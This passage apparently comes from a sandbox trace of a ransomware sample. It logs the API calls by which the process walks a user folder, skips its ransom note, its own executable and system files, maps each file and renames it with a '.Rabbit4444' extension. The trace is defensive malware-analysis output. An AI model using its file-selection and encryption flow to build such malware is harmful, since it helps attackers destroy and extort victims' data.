lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="..") returned 1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="windows") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="bootmgr") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="pagefile.sys") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="boot") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="ids.txt") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="NTUSER.DAT") returned -1 [0068.029] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}" | out: lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}") returned="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}" [0068.029] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", dwFileAttributes=0x0) returned 1 [0068.029] lstrlenW (lpString="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}") returned 38 [0068.029] lstrlenW (lpString="Rabbit4444") returned 10 [0068.029] lstrcmpiW (lpString1="A8ABC8F59}", lpString2="Rabbit4444") returned -1 [0068.029] lstrlenW (lpString=".dll") returned 4 [0068.029] lstrcmpiW (lpString1="F59}", lpString2=".dll") returned 1 [0068.029] lstrlenW (lpString=".lnk") returned 4 [0068.029] lstrcmpiW (lpString1="F59}", lpString2=".lnk") returned 1 [0068.029] lstrlenW (lpString=".ini") returned 4 [0068.029] lstrcmpiW (lpString1="F59}", lpString2=".ini") returned 1 [0068.030] lstrlenW (lpString=".sys") returned 4 [0068.030] lstrcmpiW (lpString1="F59}", lpString2=".sys") returned 1 [0068.030] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7939d66a-9de8-40a2-95e5-950a8abc8f59}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.030] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.030] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15934071751) returned 1 [0068.030] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0068.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0068.030] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.031] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.032] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15934326399) returned 1 [0068.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0068.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0068.033] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.033] CloseHandle (hObject=0x29c) returned 1 [0068.033] CloseHandle (hObject=0x280) returned 1 [0068.033] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}.Rabbit4444") returned 156 [0068.033] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7939d66a-9de8-40a2-95e5-950a8abc8f59}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7939d66a-9de8-40a2-95e5-950a8abc8f59}.rabbit4444"), dwFlags=0x1) returned 1 [0068.034] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380da02c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x380da02c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x442528d2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", cAlternateFileName="{79910~1")) returned 1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="Rabbit4444.exe") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2=".") returned 1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="..") returned 1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="windows") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="bootmgr") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="pagefile.sys") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="boot") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="ids.txt") returned -1 [0068.034] lstrcmpiW (lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}", lpString2="NTUSER.DAT") returned -1 [0068.034] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{7991069C-F81C-4E00-9CF7-E4893986E7E3}" | out: lpString1="{7991069C-F81C-4E00-9CF7-E4893986E7E3}") returned="{7991069C-F81C-4E00-9CF7-E4893986E7E3}" [0068.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7991069C-F81C-4E00-9CF7-E4893986E7E3}", dwFileAttributes=0x0) returned 1 [0068.034] lstrlenW (lpString="{7991069C-F81C-4E00-9CF7-E4893986E7E3}") returned 38 [0068.034] lstrlenW (lpString="Rabbit4444") returned 10 [0068.034] lstrcmpiW (lpString1="93986E7E3}", lpString2="Rabbit4444") returned -1 [0068.034] lstrlenW (lpString=".dll") returned 4 [0068.034] lstrcmpiW (lpString1="7E3}", lpString2=".dll") returned 1 [0068.035] lstrlenW (lpString=".lnk") returned 4 [0068.035] lstrcmpiW (lpString1="7E3}", lpString2=".lnk") returned 1 [0068.035] lstrlenW (lpString=".ini") returned 4 [0068.035] lstrcmpiW (lpString1="7E3}", lpString2=".ini") returned 1 [0068.035] lstrlenW (lpString=".sys") returned 4 [0068.035] lstrcmpiW (lpString1="7E3}", lpString2=".sys") returned 1 [0068.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7991069C-F81C-4E00-9CF7-E4893986E7E3}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7991069c-f81c-4e00-9cf7-e4893986e7e3}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.035] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.035] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15934581348) returned 1 [0068.035] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0068.035] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.036] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.037] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.038] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15934862285) returned 1 [0068.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0068.038] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.038] CloseHandle (hObject=0x29c) returned 1 [0068.038] CloseHandle (hObject=0x280) returned 1 [0068.038] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7991069C-F81C-4E00-9CF7-E4893986E7E3}.Rabbit4444") returned 156 [0068.038] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7991069C-F81C-4E00-9CF7-E4893986E7E3}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7991069c-f81c-4e00-9cf7-e4893986e7e3}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7991069C-F81C-4E00-9CF7-E4893986E7E3}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7991069c-f81c-4e00-9cf7-e4893986e7e3}.rabbit4444"), dwFlags=0x1) returned 1 [0068.039] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992a2d25, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x992a2d25, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x442528d2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", cAlternateFileName="{7C4BA~1")) returned 1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="Rabbit4444.exe") returned -1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2=".") returned 1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="..") returned 1 [0068.039] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="windows") returned -1 [0068.040] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="bootmgr") returned -1 [0068.040] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="pagefile.sys") returned -1 [0068.040] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="boot") returned -1 [0068.040] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="ids.txt") returned -1 [0068.040] lstrcmpiW (lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", lpString2="NTUSER.DAT") returned -1 [0068.040] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}" | out: lpString1="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}") returned="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}" [0068.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}", dwFileAttributes=0x0) returned 1 [0068.040] lstrlenW (lpString="{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}") returned 38 [0068.040] lstrlenW (lpString="Rabbit4444") returned 10 [0068.040] lstrcmpiW (lpString1="319E94F47}", lpString2="Rabbit4444") returned -1 [0068.040] lstrlenW (lpString=".dll") returned 4 [0068.040] lstrcmpiW (lpString1="F47}", lpString2=".dll") returned 1 [0068.040] lstrlenW (lpString=".lnk") returned 4 [0068.040] lstrcmpiW (lpString1="F47}", lpString2=".lnk") returned 1 [0068.040] lstrlenW (lpString=".ini") returned 4 [0068.040] lstrcmpiW (lpString1="F47}", lpString2=".ini") returned 1 [0068.040] lstrlenW (lpString=".sys") returned 4 [0068.040] lstrcmpiW (lpString1="F47}", lpString2=".sys") returned 1 [0068.040] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7c4ba71f-a1a6-490c-8b5d-04f319e94f47}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.041] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.041] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15935134386) returned 1 [0068.041] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0068.041] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.042] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.043] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15935411227) returned 1 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0068.043] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.044] CloseHandle (hObject=0x29c) returned 1 [0068.044] CloseHandle (hObject=0x280) returned 1 [0068.044] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}.Rabbit4444") returned 156 [0068.044] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7c4ba71f-a1a6-490c-8b5d-04f319e94f47}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7C4BA71F-A1A6-490C-8B5D-04F319E94F47}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7c4ba71f-a1a6-490c-8b5d-04f319e94f47}.rabbit4444"), dwFlags=0x1) returned 1 [0068.044] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511781d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb511781d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", cAlternateFileName="{7CE59~1")) returned 1 [0068.044] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.044] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="Rabbit4444.exe") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2=".") returned 1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="..") returned 1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="windows") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="bootmgr") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="pagefile.sys") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="boot") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="ids.txt") returned -1 [0068.045] lstrcmpiW (lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", lpString2="NTUSER.DAT") returned -1 [0068.045] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}" | out: lpString1="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}") returned="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}" [0068.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}", dwFileAttributes=0x0) returned 1 [0068.046] lstrlenW (lpString="{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}") returned 38 [0068.046] lstrlenW (lpString="Rabbit4444") returned 10 [0068.046] lstrcmpiW (lpString1="DA6ACEA49}", lpString2="Rabbit4444") returned -1 [0068.046] lstrlenW (lpString=".dll") returned 4 [0068.046] lstrcmpiW (lpString1="A49}", lpString2=".dll") returned 1 [0068.046] lstrlenW (lpString=".lnk") returned 4 [0068.046] lstrcmpiW (lpString1="A49}", lpString2=".lnk") returned 1 [0068.046] lstrlenW (lpString=".ini") returned 4 [0068.046] lstrcmpiW (lpString1="A49}", lpString2=".ini") returned 1 [0068.046] lstrlenW (lpString=".sys") returned 4 [0068.046] lstrcmpiW (lpString1="A49}", lpString2=".sys") returned 1 [0068.046] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7ce59afd-be4e-4c4f-9d9c-1bfda6acea49}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.046] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.046] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15935705173) returned 1 [0068.046] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.046] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.046] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0068.046] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.047] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.049] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15935977493) returned 1 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0068.049] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.049] CloseHandle (hObject=0x29c) returned 1 [0068.049] CloseHandle (hObject=0x280) returned 1 [0068.049] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 